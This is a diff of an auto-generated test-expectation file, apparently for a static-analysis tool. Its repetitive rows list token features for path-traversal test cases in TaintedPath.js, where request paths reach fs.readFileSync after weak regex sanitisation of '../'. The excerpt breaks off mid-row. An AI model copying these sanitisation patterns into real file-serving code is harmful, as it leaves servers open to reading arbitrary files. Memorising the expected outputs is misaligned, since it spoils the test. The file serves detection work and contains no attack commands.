fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:192:40:192:90 | pathMod ... */, '') | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:192:40:192:90 | pathMod ... */, '') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:192:40:192:90 | pathMod ... */, '') | stringConcatenatedWith | 'prefix' -endpoint- | +| autogenerated/TaintedPath/TaintedPath.js:192:51:192:59 | normalize | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:192:51:192:59 | normalize | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:192:51:192:59 | normalize | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:192:51:192:59 | normalize | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:192:51:192:59 | normalize | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:192:61:192:64 | path | CalleeFlexibleAccessPath | pathModule.normalize | | autogenerated/TaintedPath/TaintedPath.js:192:61:192:64 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:192:61:192:64 | path | calleeImports | path | @@ -6621,6 +65707,11 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:192:61:192:64 | path | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:192:61:192:64 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:192:61:192:64 | path | receiverName | pathModule | +| autogenerated/TaintedPath/TaintedPath.js:192:67:192:73 | replace | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:192:67:192:73 | replace | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:192:67:192:73 | replace | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:192:67:192:73 | replace | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:192:67:192:73 | replace | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:192:75:192:85 | /(\\.\\.\\/)*/ | CalleeFlexibleAccessPath | pathModule.normalize().replace | | autogenerated/TaintedPath/TaintedPath.js:192:75:192:85 | /(\\.\\.\\/)*/ | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:192:75:192:85 | /(\\.\\.\\/)*/ | calleeImports | path | @@ -6637,6 +65728,46 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:192:88:192:89 | '' | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | | autogenerated/TaintedPath/TaintedPath.js:192:88:192:89 | '' | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:192:88:192:89 | '' | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:194:3:194:5 | res | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:194:3:194:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:194:3:194:5 | res | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:194:3:194:5 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:194:3:194:5 | res | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:194:3:194:11 | res.write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:194:3:194:11 | res.write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:194:3:194:11 | res.write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:194:3:194:11 | res.write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:194:3:194:11 | res.write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:194:3:194:75 | exceptional return of res.wri ... , ''))) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:194:3:194:75 | exceptional return of res.wri ... , ''))) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:194:3:194:75 | exceptional return of res.wri ... , ''))) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:194:3:194:75 | exceptional return of res.wri ... , ''))) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:194:3:194:75 | exceptional return of res.wri ... , ''))) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:194:3:194:75 | res.wri ... , ''))) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:194:3:194:75 | res.wri ... , ''))) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:194:3:194:75 | res.wri ... , ''))) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:194:3:194:75 | res.wri ... , ''))) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:194:3:194:75 | res.wri ... , ''))) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:194:7:194:11 | write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:194:7:194:11 | write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:194:7:194:11 | write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:194:7:194:11 | write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:194:7:194:11 | write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:194:13:194:14 | fs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:194:13:194:14 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:194:13:194:14 | fs | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:194:13:194:14 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:194:13:194:14 | fs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:194:13:194:27 | fs.readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:194:13:194:27 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:194:13:194:27 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:194:13:194:27 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:194:13:194:27 | fs.readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:194:13:194:74 | exceptional return of fs.read ... /, '')) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:194:13:194:74 | exceptional return of fs.read ... /, '')) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:194:13:194:74 | exceptional return of fs.read ... /, '')) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:194:13:194:74 | exceptional return of fs.read ... /, '')) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:194:13:194:74 | exceptional return of fs.read ... /, '')) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:194:13:194:74 | fs.read ... /, '')) | CalleeFlexibleAccessPath | res.write | | autogenerated/TaintedPath/TaintedPath.js:194:13:194:74 | fs.read ... /, '')) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:194:13:194:74 | fs.read ... /, '')) | contextFunctionInterfaces | views_local(req, res) | @@ -6645,6 +65776,17 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:194:13:194:74 | fs.read ... /, '')) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:194:13:194:74 | fs.read ... /, '')) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:194:13:194:74 | fs.read ... /, '')) | receiverName | res | +| autogenerated/TaintedPath/TaintedPath.js:194:16:194:27 | readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:194:16:194:27 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:194:16:194:27 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:194:16:194:27 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:194:16:194:27 | readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:194:29:194:36 | "prefix" | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:194:29:194:36 | "prefix" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:194:29:194:36 | "prefix" | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:194:29:194:36 | "prefix" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:194:29:194:36 | "prefix" | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:194:29:194:36 | "prefix" | stringConcatenatedWith | -endpoint- path.replace() | | autogenerated/TaintedPath/TaintedPath.js:194:29:194:73 | "prefix ... +/, '') | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/TaintedPath.js:194:29:194:73 | "prefix ... +/, '') | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:194:29:194:73 | "prefix ... +/, '') | calleeImports | fs | @@ -6654,6 +65796,32 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:194:29:194:73 | "prefix ... +/, '') | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:194:29:194:73 | "prefix ... +/, '') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:194:29:194:73 | "prefix ... +/, '') | receiverName | fs | +| autogenerated/TaintedPath/TaintedPath.js:194:40:194:43 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:194:40:194:43 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:194:40:194:43 | path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:194:40:194:43 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:194:40:194:43 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:194:40:194:51 | path.replace | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:194:40:194:51 | path.replace | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:194:40:194:51 | path.replace | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:194:40:194:51 | path.replace | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:194:40:194:51 | path.replace | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:194:40:194:73 | exceptional return of path.re ... +/, '') | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:194:40:194:73 | exceptional return of path.re ... +/, '') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:194:40:194:73 | exceptional return of path.re ... +/, '') | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace 